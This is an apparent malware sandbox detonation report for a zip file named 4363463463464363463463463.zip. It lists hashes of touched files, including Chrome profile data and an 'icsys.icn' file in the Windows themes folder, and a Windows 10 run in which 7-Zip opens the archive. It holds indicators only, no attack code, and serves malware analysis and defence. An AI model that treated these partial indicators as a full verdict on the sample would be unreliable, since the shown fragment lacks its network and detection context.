| SHA256 | 772c7a131d2a7a239ec39f32214eb94113aacd3984f572fb7e3b1fa1bec98f8c |
| SHA512 | 35a29c81d72f0e0bdb169c400dc90bf85859313c250824bf1fbbe362903c63f6a826e94994f8d86e8f56def5ce34cc71a45c6ff936e85fcfe8d169dbdb118168 |
C:\Users\Admin\AppData\Local\Temp\Tmp4918.tmp
| MD5 | 76d90ef6fb814565698f9d54d37bf94c |
| SHA1 | 76e2cb9eb5188e96f401f4de5030be4371c6e5a0 |
| SHA256 | 7f39d6d28327e33d4b356ef266425b9a4985cfa8031757214cfb7ab2af5a3644 |
| SHA512 | d407ddcba75be5b29243c89ce520636087f68200ce937ba261810735fd61af98b78956cf1d3fb7a6a8ef8c3325aa7ba8dba43b5393d11d9e66866491524e531c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | b9f5dec63f8735652a09b7dae1ef2fc9 |
| SHA1 | 9568355eee35dc2e27889c6d93e0db42ca75c222 |
| SHA256 | ae8d8377c11d45d617e65b49e73d4c898814df02db50567ecb097ec89450a535 |
| SHA512 | 37e10406037d6b9755de228863509990776110d01c2f0a43bde4925e89b52a6e66ffe5076b3aa117616929d8491414dde4aacd80949c9e53fe7c58a644c7b906 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 04d1493c35d9d6d1d42ece9d5467197b |
| SHA1 | 18b8b179cbca8430b28e37f2dc6273f46d5242b9 |
| SHA256 | df737080b983403331733981106bcb9385eb7f0ad9907fef3c94bc5e155ef564 |
| SHA512 | 26dc8b13f6bd1e1263443a01c81f55a9fa299a008236d9989250392e06940bffaec43dfb43b98d26f4f2214e3a918a579c74260bbf4d35f35766748be87cab9f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 56ca1c169ac486cd11165f0f10503a7c |
| SHA1 | c17d72868beb9c4fc23c040f28905d45f427a90d |
| SHA256 | aa1d2fb39f828a2b4c47de7033ae106465073d6898dfa60cf069ca061369058b |
| SHA512 | 037aa3a013fb1e6e02a0b7e3b650315b23c5282f0af95df194597972e159333c223f7499b8bb6f7a196c85761d1a72a9805e061b7ef37fe59b4adf3e727040a3 |
C:\Windows\Resources\Themes\icsys.icn
| MD5 | d7dcb623cb522d25402a2e8782878d73 |
| SHA1 | b95d050300fec2c03168d07d81cd8bde5e2ff896 |
| SHA256 | ea6de8ae4370be0963b47eab8dce40d96c2d724f640f5d8335ec903187cb9c9f |
| SHA512 | 27a67e352c272a0b1d275cf17a9c62d6f13b1a2349f041551300885021ac3e2d216184c5b08ff0f9f9f782643de7816bccc3142c21e2daf688fda610a02af24e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | c6e82bb25ce0828aaf86f2b3882029c0 |
| SHA1 | 580e19cc169fd778a957b4189c461109cf2c1556 |
| SHA256 | a32842e0dc01050c33328d718d2bea3f51535ed89e1ad64196e46fbed6a06fe9 |
| SHA512 | ac7333f9d4a5e8db01e2b82f3bed15dfb79d7b490b5d42cf0fdc9d523161ef7d634817d7583d43d5d271f93e6bfbec45b3add4dd48250035583ca7e2b8f1628b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-12 18:20
Reported
2024-12-12 18:25
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
277s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Processes
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.zip"
Network